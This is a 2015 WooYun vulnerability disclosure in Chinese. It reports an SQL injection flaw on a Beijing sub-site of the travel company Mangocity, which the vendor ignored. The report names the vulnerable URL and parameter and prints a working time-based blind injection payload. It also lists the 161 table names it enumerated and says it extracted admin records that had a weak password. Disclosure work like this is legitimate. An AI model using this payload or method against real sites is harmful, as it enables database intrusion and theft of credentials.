当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135214

漏洞标题:芒果网某站存在SQL注入漏洞(可获取管理员信息)

相关厂商:芒果网

漏洞作者: 路人甲

提交时间:2015-08-19 10:01

修复时间:2015-08-24 10:02

公开时间:2015-08-24 10:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

test

详细说明:

芒果网北京分站存在sql注入漏洞,可获取到管理员信息。

漏洞证明:

链接:http://bj.mangocity.com/visa/tour_show.jsp?jspmaker_act_id=1027303

Parameter: jspmaker_act_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jspmaker_act_id=1027303 AND (SELECT * FROM (SELECT(SLEEP(5)))inWm)


通过注入可获取到dbs信息

2.jpg


当前库是ut7

4.jpg


该库中有161个表

1.jpg


[161 tables]
+---------------------------+
| account_info |
| call_post_set |
| comments |
| comments_reply |
| crm_info |
| dev_data_fields |
| dev_data_table |
| dev_input_field |
| dev_page_input |
| dev_template |
| fm_parameter |
| fm_parameter_set |
| fm_receivables_payables |
| g_accessory |
| g_fm_accounting |
| g_fm_advertisement |
| g_fm_inspect |
| g_fm_person_brokerage |
| g_sign_state |
| gather_document |
| gl_season_destination |
| gl_strategy |
| gl_strategy_page_block |
| hc_train_info |
| high_custom |
| hk_airlines_info |
| hk_flight_info |
| hk_models |
| hotel_basic_info |
| hotel_photo |
| hotel_price_info |
| hotel_room_info |
| income_expenses_single |
| insurance_company |
| insurance_info |
| jd_facility |
| jd_group_info |
| jd_hotel_info |
| jd_photo |
| jd_room_info |
| l_photo |
| member_log |
| mobile_web_page_block |
| monthly_balance |
| oa_appliance |
| oa_leave |
| oa_notice |
| oa_purchase |
| oa_purchase_log |
| oa_report_annul |
| oa_report_annul_log |
| oa_supplier |
| oa_userget |
| old_order |
| online_ask |
| optional_order |
| order_basic_info |
| order_checkseat |
| order_doc |
| order_file |
| order_finance_statistics |
| order_gathering |
| order_insurance |
| order_invoice |
| order_other_cost |
| order_outteam |
| order_pay |
| order_pay_log |
| order_pledge |
| order_reality_data |
| order_refund |
| order_remark |
| order_supplier |
| order_visit |
| order_visit_log |
| os_accessory_file |
| os_city |
| os_company |
| os_country |
| os_data_source |
| os_fileup |
| os_function |
| os_g_destination |
| os_g_trip_type |
| os_help |
| os_log |
| os_login_user |
| os_module |
| os_order |
| os_photo |
| os_province |
| os_suggest |
| os_system |
| pay_order |
| personal_quick |
| phone_to_callcenter |
| qc_car_info |
| qc_group_info |
| reg_member |
| reg_tables |
| remit_info |
| reply_question |
| scenic_info |
| scenic_photo |
| self_expense |
| set_of_book |
| sign_contract |
| sms_date |
| sms_log |
| sms_port |
| sort_table |
| strategy_article |
| strategy_aspect_info |
| strategy_destination_info |
| strategy_photo |
| strategy_web_column |
| system_seting |
| system_variable |
| t_ad |
| t_admin |
| t_article |
| t_base_trans |
| t_category |
| t_commen |
| t_gather |
| t_gatherhis |
| t_keywords |
| t_label |
| t_role |
| t_source |
| t_special |
| t_template |
| t_vote |
| t_voteitem |
| t_web_seting |
| tour_aspect |
| tour_basic_info |
| tour_basic_info_order |
| tour_destination |
| tour_price_info |
| tour_price_info_order |
| tour_schedule_info |
| tour_shoping |
| tour_stard_info |
| tour_time |
| trip_type |
| user_department |
| user_msg |
| visa_basic_info |
| visa_reservation |
| visa_test |
| visitor_list |
| web_article |
| web_column |
| web_custom |
| web_email_subscriptions |
| web_error_page |
| web_friendly_link |
| web_page_block |
| web_set_tour_aspect |
| web_set_tour_destination |
+---------------------------+


跑了一下t_admin的数据做验证,管理员密码还是弱口令。。。

3.jpg

修复方案:

做好过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-24 10:02

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无